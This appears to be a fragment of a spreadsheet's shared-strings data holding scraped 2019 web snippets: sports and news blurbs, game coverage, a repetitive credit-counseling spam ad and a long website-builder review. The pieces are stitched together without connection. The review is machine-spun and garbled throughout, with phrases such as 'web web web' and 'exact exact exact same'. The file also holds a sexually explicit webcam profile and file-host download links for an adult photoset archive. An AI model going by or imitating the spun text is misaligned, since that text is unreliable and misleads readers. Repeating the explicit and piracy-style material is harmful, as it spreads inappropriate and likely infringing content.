    <t>Consumer Credit Counseling Service | (888) 551-1270 Free Consumer Credit Counseling Service call (888) 551-1270 Credit Repair, Bankruptcy Counseling, Foreclosure Prevention, Student Loan Debt Consolidation, Car Repossessions and Wage Garnishment solutions, Debt Management. Clifton, New Jersey Consumer Credit Counseling Service | (888) 551-1270 Wednesday 31 July 2019 12:17 AM UTC-05 | Tags: clifton-new-jersey-consumer-credit-counseling-service-888-551-1270 https://youtu.be/7vN2eYTkFV4 Clifton, New Jersey Free Consumer Credit Counseling Service call (888) 551-1270 Credit Repair, Bankruptcy Counseling, Foreclosure Prevention, Student Loan Debt Consolidation, Wage Garnishment and Vehicle Repossession solutions, Mortgage Loan Modification, and Debt Settlement through chapter 13. Clifton, New Jersey Credit counseling (888) 551-1270 starts with the parent and may include intermediaries later in life empowered by the individual debtor to act on their behalf to negotiate with creditors and resolve debt that is beyond a debtor's ability to pay. Credit counseling is a generic name and is not a brand name owned or controlled by any agency or company. Clifton, New Jersey Consumer credit counseling services (888) 551-1270 are provided by attorneys, accountants, finance and tax professionals, for-profit, and non-profit credit counseling companies. Regulations on credit counseling and credit counseling agencies varies by country and sometimes within regions of the countries themselves. In Clifton, New Jersey individuals filing Chapter 13 bankruptcy are required to receive counseling from a designated credit counseling agency. https://www.youtube.com/channel/UCqFSDDQNMeoCiHOGA0-O9xQ/about https://t.co/JqMKB0967s — Texas Consumer Credit Counseling Service (@GeneroSebastian) July 17, 2019 https://twitter.com/GeneroSebastian/status/1151304115865059328 Tags: clifton-new-jersey-consumer-credit-counseling-service-888-551-1270</t>
  </si>
  <si>
    <t>My Kinks: We are passionate about erotic dancing, we light u Webcam profile: Hi guys, we are the curious Latina sex kittens; cheerful, extroverted and full of energy; passionate about sports, dancing and exotic restaurants … Besides all we are extremely sensual and hot, we love hard sex, play with our tongue in the pussy. Favourite sex position: What I do in my amateur show: What I don’t like: Gallery</t>
  </si>
  <si>
    <t>webempresa.com</t>
  </si>
  <si>
    <t>https://bit.ly/2PctE6V En este vídeo tutorial hablaremos sobre el plugin YITH WooCommerce Points and Rewards para tiendas online creadas en WordPress. Este plugin es sobre … source</t>
  </si>
  <si>
    <t>Michael Traill</t>
  </si>
  <si>
    <t>In its near 100-year history, no official name has ever been recorded for the oval on Clayton Road.</t>
  </si>
  <si>
    <t>Prepare for trouble – Rocket team landed in Pokemon Go. It means new Rocket stops replacing the Pokestops, plus the ghost Pokemon who can become purified Pokémon with new combat encounters against Rocket Grunts. It is not really Team Rocket that you may be familiar with if you have already played other Pokemon games. In fact, it's a slightly different group, Team GO Rocket, exclusive to Pokemon Go. But let's be fair: it's just a Team Rocket. Their appearance was teased in the game for a while. time now, and they are finally here, gradually deployed around the world. You can just wait for a natural encounter to happen with them, of course, but if you are a powerful coach, you will probably want to look for members of this ugly organization to inflict punishment. On this page, we'll help you find Team Rocket … and explain all the new things you can do once you've done it. Pokemon Go Rocket Stops: Find the Rocket Team in the Rocket Team Pokestops The Pokemon Go World Center is of course Pokestops, and so it is not surprising that the Team Rocket Invasion of the game starts with them rebranding some of them into Team Rocket Pokestops, or Rocket stops to shorten it. You will be able to spot a remote rocket stop – Pokestops invaded by a glitching icon above them, the cube above the stop twisting and turning from the normal blue color to a darker shade. As you approach, it becomes obvious that this is a Team Rocket Pokestop: it becomes black and carries the gigantic R logo above, for Team Rocket, and a Rocket Grunt will appear nearby. Team Rocket members appear and invade Pokestops for 30 minutes at a time. They will go from Pokestop to Pokestop.. Each invasion is essentially a random event and limited in time. However, each rocket stop is universal: it will therefore appear as a rocket stop for all players during the duration of its invasion. The Rocket Stop feature has nothing to worry about, but rather the essentials for you: Team Rocket Grunt. Like a Pokemon encounter, you can tap the grunt to interact with them – except against a Grunt, it will engage you in a coaching battle, which will function in the same way as player-to-player combat. You can fight an unlimited number of grunts a day, but only once on a given Pokestop. Fight the Rocket Grunts Team and its Shadow Pokemon for Rewards Once you've hit Team Rocket's growling camp on an invaded Rockest Stop, you're immersed in a coaching battle. Team Rocket Grunt will use Shadow Pokemon – Pokemon possessed of negativity that will have an evil red glow on their eyes. It works a bit like a combination of raid battle and player battle. The fight works like in PVP, but once the Grunt Rocket is defeated, you will have the chance to catch one of the Rocket Grunt's Shadow Pokémon with a mechanism very similar to the one following the raids. You will be able to determine the type of Pokémon you are about to meet and then have a chance to understand how Rocket Grunt is talking to you: if they warn you that you are approaching dangerous waters, it will be a water- type, while if they tell you not to "tangle" with them, it will be grass, and so on. The number of Premier balls you have for your encounter with Shadow Pokemon is determined by factors such as your Defeat Team Rocket and Purify Pokemon medal rankings (which are achieved simply by beating Rocket Grunts and Purifying Pokemon), as well as your performance at during the previous battle. Once a Pokemon Shadow has been caught, you have it as your own way, but to really make it one of yours, you have to take care of the purification of this Pokemon Shadow. In addition to the reward of having caught the Shadow Pokémon, each battle will bring you 500 Stardust. The post-invasion of Pokemon Go Team Rocket: rocket stops, rocket coach battles and rewards explained first appeared on VG247.</t>
  </si>
  <si>
    <t>Alexander Albon was ‘really happy’ with his performance during Sunday’s German Grand Prix, with the Thai driver placing sixth in what was his first ever run in wet conditions in a Formula 1 car! The Scuderia Toro Rosso driver capped off a tremendous day for the Faenza-based outfit by taking home eight well-earned World Championship points to complement the podium finish for team-mate Daniil Kvyat, who was one of the drivers to jump Albon when he made his pit stop for slick tyres late in the race. Albon pitted only one lap later than Kvyat but such was the pace advantage of the slick tyre runners, the Russian was able to jump ahead and fight for the top three finish, while the Thai driver was left to battle the likes of Pierre Gasly and Carlos Sainz Jr. for the top six. Late in the day, Albon survived contact with Red Bull Racing’s Gasly as the two ran down the straight towards the Mercedes arena, with the Frenchman breaking his front wing and damaging his left front tyre in the incident. Never-the-less, Albon was content to bring home the points, especially after starting down in sixteenth position after a difficult Qualifying session the day before. “It was a good race today!” said Albon. “I was a bit scared at the start, learning how the car behaves in the wet around this track, although, I’m really happy with how I performed as it was my first time in these conditions in an F1 car. “The pace was really good, we were a bit fortunate and we timed our first pit stop right, and I was really excited racing in P4, I was thinking ‘OK here we go!’ Unfortunately, at the second stop we were caught out and pitted a lap later than Dany to switch from wet tyres to dry, so four cars passed us. “It’s funny, it’s like a disappointing P6 because we were running in P4 for quite a while. It was an amazing job by the team, the strategy was great and we were able to bounce back from a difficult Qualifying.”</t>
  </si>
  <si>
    <t>Samantha</t>
  </si>
  <si>
    <t>Oh. Hello. I’m really not very consistent with writing blog posts am I? I said to myself everyday this week that I’ll at least start a few but then the sun came out and we had a heatwave and basically The post Answering Vogue’s 73 questions.. appeared first on Samantha. J.</t>
  </si>
  <si>
    <t>I have been using Clorox wipes and a damp mircofiber cloth. Is there a better way to do it? submitted by /u/NEWBURNz [lin... How do you clean your MacBook screen?</t>
  </si>
  <si>
    <t>Joshua Close</t>
  </si>
  <si>
    <t>The summer break is over! After a three-week break, MotoGP returns this weekend at Brno, Czech Republic. The riders have had a chance to relax and recover from any injuries, whilst the manufacturers have had a chance to evaluate their season so far. Now, it’s time to reset and get back into race mode. It’s been quite the season so far, with many different stories hitting the headlines. Marc Marquez sits comfortably at the top of the standings. The reigning champion is 58 points clear of Andrea Dovizioso, his closest rival. The championship battle appears to be over. However, Brno is a circuit that always mixes things up a little. Marquez only has two victories at the circuit in the premier class. So, who will step up and challenge in the Czech Republic? More Brno Success for Ducati? Arguably, no team wanted the summer break more than Ducati. The first half of the season was a mixed bag for the Italian giants. As the rounds came around, they fell further behind their rivals. Dovizioso won the opening round at Qatar. However, since then he has only secured three podium finishes. More importantly, he hasn’t finished above Marquez at all. Brno is a good circuit for Dovizioso to kick-start his season. The Italian won the 2018 race, with Jorge Lorenzo making it a one-two for Ducati. Power is important at a hilly circuit such as Brno, and the Ducati has plenty of that. Meanwhile, Danilo Petrucci will be thrilled that the break is over. In contrast to his team-mate, Petrucci is enjoying life on the factory bike. Despite a slow start, he became a MotoGP race winner at Mugello and is only six points behind Dovizioso. Petrucci his shown that he isn’t afraid to fight his team-mate, or Marquez for that matter, so perhaps we’ll see him on the top step this weekend. Yamaha Revival During the first half of the season there have been some very promising signs for Yamaha. Maverick Viñales secured his and Yamaha’s first victory since Philip Island 2018 at Assen. He followed that up with a second place in Germany. Surprisingly, if the Spaniard secures a podium at Brno it’ll be the first time he’s taken three premier class podiums in a row. He may have to fight hard in order to do so, Viñales’ record at Brno isn’t the best. He crashed out on the opening lap last year, finished ninth in 2016, and crashed in 2015. However, he did finish third in 2017. Yamaha also have Fabio Quartararo on their books. The French rookie has been a sensation this season, becoming the youngest-ever MotoGP polesitter. In total, he has three pole positions and two podiums in 2019. He’s only made one mistake so far, crashing out in Germany last time out. That incident will have motivated Quartararo even further. He’s now refreshed and fully recovered from his arm pump surgery. Can Rins Bounce Back? The last two races have not been kind to Alex Rins. The Suzuki man crashed out of the lead at Assen, before doing the same whilst in second at the Sachsenring. These results have seen him drop down to fourth in standings, 84 points behind Marquez. Of course, this also means that the pressure, title-wise, is now off. Rins will be more determined than ever to add to his one MotoGP victory. Rins has finished 11th in both of his premier class races at Brno. He did, however, finish second in the 2017 Moto2 race, and third in the 2015 event. Will Rossi Respond to his Critics? Plenty of people have been questioning whether Valentino Rossi should continue beyond 2019. Questions were raised following three consecutive DNFs and an eighth in Germany. After a nice three-week break, Rossi will be hoping to bounce back immediately and start the second half of the season with a bang. Brno has certainly been good to him in the past. The Doctor has five victories in the premier class. He also secured three consecutive podiums between 2014 and 2016. Rossi will now hope to find the perfect setup and match the success of Viñales and Quartararo. Lorenzo Not Ready Lorenzo will not be taking part at Brno this weekend. The Repsol Honda man is still recovering after fracturing his T6 and T8 vertebra at Assen. Despite his overall condition improving, the 32-year-old remains in some pain and has limited movement on a bike. In an official statement, it was revealed that Lorenzo will not return until the British Grand Prix at the earliest. Stafan Bradl will replace Lorenzo once again. The German was already due to appear as a wildcard, but he will now compete as the official second rider for Honda. Brno Schedule The weekend’s action begins on Friday (02 August 2019) with Free Practice 1 at 08:55. This will be followed by Free Practice 2 at 13:10. Saturday’s (03 August 2019) action begins at 08:55 with Free Practice 3, with Free Practice 4 at 12:30. Qualifying 1 begins at 13:10, with Qualifying 2 at 13:35. Sunday’s warm-up (04 August 2019) will begin at 08:40. The race begins at 13:00.</t>
  </si>
  <si>
    <t>Kristina Costabile</t>
  </si>
  <si>
    <t>Another week has passed in the CFL with a wide variety of quarterback performances that either entertained or pained you depending on allegiance. » RELATED: Ferguson breaks down the method behind QB accuracy Let’s break down Week 7 in the CFL: Week 7 saw a total of ten quarterbacks take meaningful snaps (not including BC’s Danny O’Brien or Saskatchewan’s Isaac Harker and Bryan Bennett). The only teams to have multiple quarterbacks take the field were Toronto and Hamilton. One due to poor performance, the other due to a season-altering non-contact injury. Unsurprisingly if you watched last Thursday’s Argos vs. Esks game, in which Toronto was shutout on the road to end their three game Western road swing, both Argos’ passers came last in accuracy with two grades below that of the previous low standard for a tandem of passers from the same team in one game – Alouettes QBs Antonio Pipkin and Vernon Adams Jr. in Week 1 (also at Edmonton). Mike Reilly suffered yet another difficult defeat at the hands of the Riders on Saturday in Vancouver. There is an absolute correlation between the amount of pressure Reilly gets in any given game and the accuracy grade he achieves in that game. Matt Nichols struggled to find the mark right off the bat this week in Hamilton. While bringing in a 19-pass completion streak from the Bombers Week 6 win over Ottawa, Nichols had his first play shovel pass fall to the turf before air mailing his second attempt for an interception, just his second to that point on the season, but a pattern that would be duplicated twice more on the evening. That night, Hamilton held the Winnipeg QB to his second lowest accuracy grade this season with the only other low mark coming at home against Edmonton in a loss. Dane Evans struggled to get in rhythm but just like Cody Fajardo in Week 1 relief duty in Hamilton, it’s unfair to assume the new Ticats starter will be unable to dial it in moving forward, while Trevor Harris continues to plug away as one of the CFL’s most consistently accurate quarterbacks. Jeremiah Masoli’s Week 7 was off to a sensational start when he tried to roll out against the containment of Bombers defensive end Craig Roh and felt his knee buckle. Masoli barley missed the podium this week but that wouldn’t have meant much in way of an accomplishment for a man whose only goal this year was to lead Hamilton to a Grey Cup championship. Let’s take a look at our top three performers for Week 7. 3. Saskatchewan QB Cody Fajardo While William Powell was undoubtedly the star of the show in Vancouver on Saturday, Fajardo held his own when asked to move the football. He showed a variety of arm angles, releases and throw types he’s capable of making. I’m excited to see how his game is challenged by a Ticats defence that applied numerous pressures and hits to Bombers QB Matt Nichols last week. 2. Ottawa REDBLACKS QB Jonathon Jennings What?! I know right.. At halftime – with an accuracy grade of 65.0 – Jonathon Jennings was well on his way to being condemned by the CFL on TSN panel as damn near unfit to wear a CFL uniform. While his second half performance was nothing to write home about in terms of sensational throws that Jennings was known for in 2016 BC Lions orange, he did battle his way back into a respectable grade with ten-straight completions and an improved tempo at the line of scrimmage. With Dominique Davis expected to return this week, I wonder when – if at all – Jennings will make another weekly accuracy grade podium in 2019. 1. Calgary Stampeders QB Nick Arbuckle Well, here he is again. It felt all game as if Arbuckle should have the Stamps up in Ottawa by twenty but turnovers and a couple big plays kept all things relatively even. Despite the close final score, Arbuckle undoubtedly had another great week in place of still injured Bo Levi Mitchell but should face one of his toughest tests yet against Edmonton on Saturday, a team that has held several quarterbacks to their lowest grades of 2019. Now a look at the updated standings for this season. The CFL wide accuracy average raised yet again this week due in large part to the addition of Dane Evans to the fold as he now qualifies for the season-long mark as a QB having at least 15 per cent of his team’s pass attempts (31 of Hamilton’s 206). Masoli’s 2019 grading comes to a close at 67.6 after rising +0.3 in Week 7, which combined with Matt Nichols‘ rough week, gave back Hamilton’s injured QB a top three spot. Argos starter McLeod Bethel-Thompson plummeted this week all the way from sixth to twelfth while Mike Reilly dropped -0.9 in a second-straight loss to Saskatchewan. Last week Jonathon Jennings of the REDBLACKS was in the basement of the league-wide rankings but has now found his way out and above his teammate Dominique Davis, similar to Evans in Hamilton. Perhaps both these Eastern duos are showing how system impacts accuracy. Something to keep an eye on as the season progresses.</t>
  </si>
  <si>
    <t>In the first of a new series, we look at the PM’s promises and their costThe last day of the parliamentary session before the summer recess normally marks the period when the Treasury starts to wind down for the summer. The chancellor takes a break and a skeleton team takes control. But not this year.Seated next to Boris Johnson as he made his first statement to MPs last Thursday was Sajid Javid, the new chancellor of the exchequer, and the man given the task of delivering the prime minister’s tax and spending pledges this autumn. Continue reading… Read More</t>
  </si>
  <si>
    <t>Rachel Wells</t>
  </si>
  <si>
    <t>Expect a slow journey if you head through Melbourne on Sunday, with extensive road and rail works set to impact travel across the city.</t>
  </si>
  <si>
    <t>Paying a $20 carbon offset for your flight might make you feel less guilty, but it doesn't always help fight climate change, experts say.</t>
  </si>
  <si>
    <t>PTG Benny</t>
  </si>
  <si>
    <t>This is a great price for a 3 pack considering that they are on the Bonds website for $24.95 each I know it is not the cheapest they have been but it is the best price at the moment. Please note that there are 3 colour options - Navy, Black and Grey Description Providing a breathable cotton rich blend everyday comfort, these trunks feature a functional flyfront, no sideseams and a super soft waistband giving you the freedom to move. Available in men's sizing - see size chart for correct fit! Features: Bonds underwear For men Style: Guyfront Trunks Pack contents: 3 Colour: Navy Classic fit Stretch cotton fabric Functional flyfront No sideseams Elasticised logo waistband Materials: Body: Cotton/elastane Waist elastic: Nylon/polyester/elastane Machine washable Designed in Australia Please note: change of mind returns will not be accepted for this item due to hygiene reasons</t>
  </si>
  <si>
    <t>Sjostrom is a brutally fast freestyler and Campbell will have to be at or near her best to hang tough late if she wants another gold medal for the cabinet.</t>
  </si>
  <si>
    <t>Larger than ever imagined. It's been over a year since we received a last update on the much anticipated The Last of Us: Part II, but speaking at Manchester Comic-Con this weekend, star Troy Baker has managed to make us want to talk about what we can expect from the title when the title unfolds. The actor, who plays Joel in the series, was afraid to give too much detail – but he added that he was even surprised to see how the project came about. "I can tell you this: this is by far the most ambitious game Naughty Dog has ever done," he exclaimed. "He is much bigger than I thought I could be." Read the full article on pushsquare.com .</t>
  </si>
  <si>
    <t>Dell Cameron / Gizmodo: Documents show that Amazon’s Ring vets and authors public statements about Ring attributed to police and delays announcing partnerships with police departments — Amazon’s home security company Ring has garnered enormous control over the ways in which its law enforcement partners are allowed … Source link</t>
  </si>
  <si>
    <t>Source: http://www.techmeme.com/190731/p2#a190731p2 Amazon announces general availability of Neural Text-to-Speech and “newscaster style” in Amazon Polly, its cloud service that converts text to speech (Kyle Wiggers/VentureBeat) Kyle Wiggers / VentureBeat: Amazon announces general availability of Neural Text-to-Speech and “newscaster style” in Amazon Polly, its cloud service that converts text to speech — Not to be outdone by Google’s WaveNet, which mimics things like stress and intonation in speech by identifying tonal patterns … Source: http://www.techmeme.com/190731/p2#a190731p2 The post Amazon announces general availability of Neural Text-to-Speech and “newscaster style” in Amazon Polly, its cloud service that converts text to speech (Kyle Wiggers/VentureBeat) appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>THERE has been an update to the Highway Code which reflects the recent changes to smart motorway laws which address how you could be fined by ignoring a lane closure. Daily Express :: Cars Feed</t>
  </si>
  <si>
    <t>A staff writer</t>
  </si>
  <si>
    <t>From a spacious rooftop terrace with a yoga deck to a fully equipped gym and sauna plus an open-air movie theatre, Verdant by Stirling Capital provides almost everything a modern apartment resident could need.</t>
  </si>
  <si>
    <t>SONGBIRD Vimbai Zimuto says her children are not bothered by nudity as they embraced it as part of her career. Speaking on the sidelines of her photo exhibition press conference, she said her daughters are happy with the way she is being artistic. The exhibition will be held at The Venue in Avondale. “I have two daughters Keisha and Keita, aged 15 and eight years old. They were not really</t>
  </si>
  <si>
    <t>Make a witch Described as a "RPG of the world of life", Project Witchstone belongs to Spearhead Games, the original team of Omensight and Stories: The Path of Destinies. We enjoyed both games mainly because of their implementation of the player's choice. Plugging in the scenarios is clearly the highlight of the studio, so hear that he's working on a good RPG has interested us. The Witchstone project arrives on PlayStation 4 in the second quarter of 2020, but does it have your attention? Make a difficult choice in the comments section below. Read the full article on pushsquare.com .</t>
  </si>
  <si>
    <t>STOMACH Bloating is a familiar complaint in the UK. There are many dietary adjustments people can make to beat the bloat. Growing evidence suggests a popular natural remedy may help. Daily Express :: Health Feed</t>
  </si>
  <si>
    <t>Newcastle United have announced the signing of highly-rated youngsters Kyle Scott and Jake Turner. Scott – a 21 year old midfielder – arrives on a free after failing to agree a new deal at Chelsea earlier this summer, while Turner is a England youth international goalkeeper who arrives from Bolton. Here’s a snippet from the club’s official announcement on NUFC.co.uk: Source</t>
  </si>
  <si>
    <t>MPLStudios | 2019-04-26 | Hi-Res Photoset | 275 Mb rapidgator:MPLS.2019.04.26.Cara.Mell.After.The.Beach.rar uploaded:MPLS.2019.04.26.Cara.Mell.After.The.Beach.rar katfile:MPLS.2019.04.26.Cara.Mell.After.The.Beach.rar mexashare:MPLS.2019.04.26.Cara.Mell.After.The.Beach.rar filefox:MPLS.2019.04.26.Cara.Mell.After.The.Beach.rar title:[MPLStudios] Cara Mell – After The Beach</t>
  </si>
  <si>
    <t>Emina Ashman’s writing debut at La Mama Courthouse is a humorous, political and passionately soulful two-hander.</t>
  </si>
  <si>
    <t>Right One Web Web Web Page Internet Site Builders The popularity that is growing of web web internet sites has turned them into a serious contention in the area of site building niche. They’ve been undeniably a simple method for|way that is good a striking online representation letting owners satisfy their visitors’ arising requirements although such sites aren’t for everybody. they’ll not gain big organizations involved with different niches in the exact exact exact same time. One-page sites will be the bet that is best for little enterprises in search of an opportunity to express their content in a linear manner. They provide to slim straight down clients’ option keeping them dedicated to a particular solution, item or bit of content you’ll need. If correctly organized and skillfully created, one-page sites might lead to a much higher transformation price if in comparison to multi-page jobs. Producing a good internet site today is barely a challenge taking into consideration the array of web site builders which do not need unique abilities or knowledge that is technical. We now have carried out a summary of top platforms that may truly fulfill your one-page web site building requirements. One Webpage Internet Site Builders Having a webpage builder to generate a single-page website from scratch is an easy and solution that is cost-effective. You might have a ready-to-use task posted and running at no time. Contemporary application is revolutionary and technologically advanced level affordable with a few platforms offering free plans and inexpensive entry packages, which can be sufficient one-page website. This is the way you’ll take advantage of a builder that is website Mobile-Friendly Website – one-page sites are primarily concentrated around mobile users. site builders enable you to come up with a task that may run efficiently on numerous kinds of cellular devices. Fashionable online Design – you don’t need to engage a expert website design company. Merely select from ready-made templates with all plugins, add-ons, obstructs and parts you may require. Easy Use – no coding abilities . You simply need certainly to place appropriate information, upload several pictures, and suggest your email address. Then chances are you just need to press the switch and use the internet along with your new site. Modern internet building pc software guarantees great operation, fast loading, SEO-friendliness, as well as other vital facets. The thing that is only kept would be to determine the bets website builder for one-page internet sites. Wix – is the right one page website builder along with necessary tools into the pack to go surfing with a great solitary web page website. makes it simple outstanding core elements without unique coding or internet designing abilities. You can produce an initially searching one-page web web web site within a handful of hours by way of a straightforward drag-and-drop editor, ready-to-use adaptive templates, AI-powered technologies, and other wonderful features to really make the building process faster and easier. is perfect for bloggers also for business owners associated with various business that is small. No programming that is in-depth needed in addition to huge web-building expenses. The working platform includes a plan that is free addition to its affordable premium packages in the event that you crave for lots more freedom. Ready-to-Use One-Page Templates – Wix possesses ready-made layout for this specific kind of web sites. The template is sold with all blocks and parts including the “About US” part, solution description, profile block, contact and target parts, anchor links, etc. You merely need certainly to feel when you look at the real information and publish the website that is mobile-friendly. Ease-of-Use – you are free to customize it if you do not like a custom layout. A drag-and-drop website builder advice net that is simple makes it simple obstructs or alter their place. You’ll include all media that are necessary or text nearly seamlessly. Logo Maker – create your personal logo design, that will be the very first thing your site visitors see or choose for Wix logo design manufacturer tool that may design several examples considering your internet site info. Merely respond to several effortless questions to get your ready-to-use logo that is exclusive. Wix ADI – this tool is for those that don’t desire to take to the building procedure. Advanced AI-based technologies will make use of the info prov &gt;Cost: if Wix plan that is free maybe not adequate to satisfy requirements, combination plan appears like a genuine discount thinking about the cost of $4.50 each month. You can also choose $8.50 per month to connect your domain that is own name benefit type adds-free templates. uKit – is one of affordable one-page web site builder among other platforms. The system makes it pretty simple to come up with your one-page site from scratch despite low prices. You are going to barely find an platform that is easier-to-use hundreds of responsive template designs for various company industries. Users can select from 38 groups and select a design with a pack of marketing instruments, grid-based framework, SEO settings, along with other abilities. Building an internet site with uKit fast and cheap. It really is perhaps one of the most affordable provides on the internet. At the exact exact exact same time, it is possible to reap the benefits of a array of features, apps, and add-ons for your own future site along with some technical advances like uKit ALT. Mobile-Ready Templates – uKit delivers over 4000 templates that are different significantly more than 38 groups. You shall undoubtedly discover the fulfills needs. All mobile and retina-ready templates operate similarly well on different products inspite of the provider or screen sizes. They have been appropriate for all major browsers and optimized for better online performance. Site Preview Feature – the machine makes it simple to preview and modify your website that is future in mobile modes according to the unit kind. method will run using a tablet, desktop or smartphone by pressing a icon that is particular your dashboard. SEO Settings – uKit reserves some area for the site advertising. Merely Search Engine Optimization settings part and fine-tune your meta description and title. Here you are able to suggest keyword and edit the preview that is website social media marketing and search engine results. Advanced uKit ALT Feature – device to convert a preexisting Facebook page right into a ready-t-use page website that is single. There is no need to transfer info and content. The machine will do it automatically div &gt;Cost: uKit looks just like a deal considering its rates. You receive a domain, hosting, and ready-to-publish web site just for $4 each month (the starting plan). Users must not rely on package though it nevertheless delivers a trial that is 14-day. The premium plan costs just $12 each month. 3. WordPress WordPress open-source that is flexible platform that lets site owners implement any design concept as innovative because of the web site that you can. It had been initially developed as a strong blogging tool that is online. But, the CMS platform has developed over the years turning out to be a multipurpose internet site building instrument with several thousand themes, features, plugins, and other items that will definitely do just fine when making an expert solitary page web web web site. Quality One-Page Themes – it is possible to run into several thousand one-page web web web site designs for WordPress. They include both free and pa &gt;Cost: building a web site with WordPress can cost you absolutely nothing until you decide on reasonably limited integrate or template compensated plugins. Having said that, you will be the main one to take care of the hosting solution for the site along with complete the domain registration procedure. Both procedures need additional expenses. Deciding on advanced level host solutions like Bluehost could be a good solution. everything required in an individual package for $2.95 per month WordPress optimized host solution. Ucraft – could be the most useful bet when you wish to bring your most generate one-page design tips to life without technical abilities. If you’d like to develop a one-page web site that will result in a higher transformation price, convenience to success. That is where Ucraft will come in handy. A instrument that is simple you build professional and engaging solitary page sites with ease. Users will appreciate page that is free tools and immediate ways to get your online task on the web. Right here you obtain every thing necessary from the customized manufacturer to website landing page Builder and much more. Complimentary Landing Page Builder – create a landing that is professionally looking without investing a cent. Ucraft has its customized tool to demonstrate your product off or service online efficiently. All that’s necessary is to sing in, select from a variety of templates, advertisement content and publish a ready-to-use website having a customized Ucraft domain. One-Page web web Site Templates – browse through a large number of ready-made and mobile-friendly templates from significantly more than 11 categories that are different. Right here you will probably find different company niches including medical and occasions to activities, eating at restaurants and designs for non-profit businesses. Free Logo Maker – another instrument that is great be noticeable from rivals while making your brand-new website as identifiable that you can. Aside from the brand’s , users can design their very very own icons to atart exercising . design towards the Service of pros area. Web web web Page Customization Tools you are free to create a style of your own with the help of Ucraft Designer Instruments–if you do not feel like using a custom template design. Make use of them fonts and colors, text sizes and styles, create personalized headlines and internet site blocks, etc. Price: a plan that is free a good solution for many who desire to save yourself a few dollars and produce a free one-page website with own customized domain. Nevertheless, it’s going to be posted with a few restrictions to content modifying. You will have to buy Pro Website plan if you want to open access to all of options. It really is available by having a trial that is 14-day verify that every thing works best for your needs.</t>
  </si>
  <si>
    <t>Pictures from the scene show both vehicles with serious damage.</t>
  </si>
  <si>
    <t>Judith Ireland</t>
  </si>
  <si>
    <t>Paralympic champion Kurt Fearnley says people with disability must be listened to when it comes to concerns about the royal commission.</t>
  </si>
  <si>
    <t>FP Elephant</t>
  </si>
  <si>
    <t>There’s less than three weeks to go before the start of the new fantasy football season. FPL fever ...</t>
  </si>
  <si>
    <t>L'Oreal, one of the world's largest cosmetics companies, missed estimates for its second-quarter sales growth citing weakness in U.S. demand.</t>
  </si>
  <si>
    <t>Best Dentists in Thornhill, Vaughan, ON – Rosedale Family Dental Centre, David McDowell, DDS, Scherer Karen, DDS – Thornhill Village Dental, DH Smile Center Dentistry, Tappuni Dental, Marketplace Dentistry, Watergarden Dental, North York Dental. Best General Dentistry in Thornhill, Vaughan, ON – David McDowell, DDS, Thornhill Village Dental, Tappuni Dental, Thornhill Square Dentistry, Susie Ang, DDS, Rosedale Family Dental Centre, DH Smile Center Dentistry, Massi Dental Clinic, Highest Rated Dentist Near Vaughan Friendliest Dentist In Vaughan Ontario Bloom is on The Rose Corp. in Newmarket, Kitchener – “The town is incredibly developer-friendly, but not out of desperation. With a lot of municipalities, you end up going to. Sunrise Dental – Vaughan – phone number, website, address &amp; opening hours – ON – Teeth Whitening Services, Dentists. Dr. Best Pediatric Dentists in Thornhill, Vaughan, ON – Kids Dental Group, Thornhill Dental Associates, Thornhill Square Dentistry, 20 Finch Dental, Massi Dental Clinic, Dr. Katbab Dentistry &amp; Dr. Katbab Optometry, Children's Dental Home, Dentistry on. Best Dental Clinic Near Vaughan Our dental office proudly serves the Vaughan, Woodbridge, Maple and Richmond Hill areas offering general dentistry, The clinic provides a wide range of dental services – everything from routine dental visits and teeth whitening, to dental implants and dentures. Top Dental Clinic In Vaughan Ontario How Dental Implants Improve a Person’s Smile and Sense of Best Pediatric Dentists in Thornhill Woods, Vaughan, ON – Kids Dental Group, Vaughan Children's Dentistry, Dental Works 4 Kids, Thornhill Dental Associates, Woodbridge Kids Dentistry &amp; Orthodontics, Joseph Benbassat, Dr. Gina Ha &amp; Associates, DLK.</t>
  </si>
  <si>
    <t>Kayzo - Cruel Love feat. shYbeast &amp; FRANK ZUMMO Kayzo - Cruel Love feat. shYbeast &amp; FRANK ZUMMO by Ultra Music The Latest &amp; Greatest from Ultra Music http://smarturl.it/UltraLatestGreatest Follow Kayzo: https://instagram.com/kayzomusic/ Tweets by KayzoMusic https://facebook.com/kayzomusic/ Follow shYbeast: https://www.instagram.com/shybeast/ Tweets by iamshybeast iamshybeast.com Follow FRANK ZUMMO: https://www.instagram.com/frankzummo/ https://www.facebook.com/frankzummomusic/ Tweets by fzummo Song Credits: Written &amp; […] The post Kayzo – Cruel Love feat. shYbeast &amp; FRANK ZUMMO (Official Video) [Ultra Music] appeared first on Dubster.</t>
  </si>
  <si>
    <t>Max Holloway successfully defended his UFC featherweight title with a win over Frankie Edgar in the main event of last night’s UFC 240 pay-per-view card from Rogers Place in Edmonton, Alberta, Canada. Source: Sports Business News</t>
  </si>
  <si>
    <t>Abbianca Makoni</t>
  </si>
  <si>
    <t>The UK is expected to edge towards its hottest ever July day, with the mercury due to soar above 30C (86F) on Tuesday.</t>
  </si>
  <si>
    <t>Alexa MacLean</t>
  </si>
  <si>
    <t>Within the past few weeks, three white sharks have been sighted along Nova Scotia's south shore through OCEARCH tagging data.</t>
  </si>
  <si>
    <t>A woman who had accused a ruling party MP of rape was seriously injured and a key witness died. The post Unnao rape: India murder probe over fatal crash appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>Product Name: Phone Photography Tricks Click here to get Phone Photography Tricks at discounted price while it’s still available… All orders are protected by SSL […] The post Phone Photography Tricks appeared first on Sell Me Something. Source link</t>
  </si>
  <si>
    <t>Nicole Precel</t>
  </si>
  <si>
    <t>Australian swimmer Shayna Jack, who has tested positive for banned substances, has been in tears every day, says her manager.</t>
  </si>
  <si>
    <t>Jimmy Garoppolo Talks 49ers Training Camp, Brian Urlacher, Other Greats Source: Sports Business News</t>
  </si>
  <si>
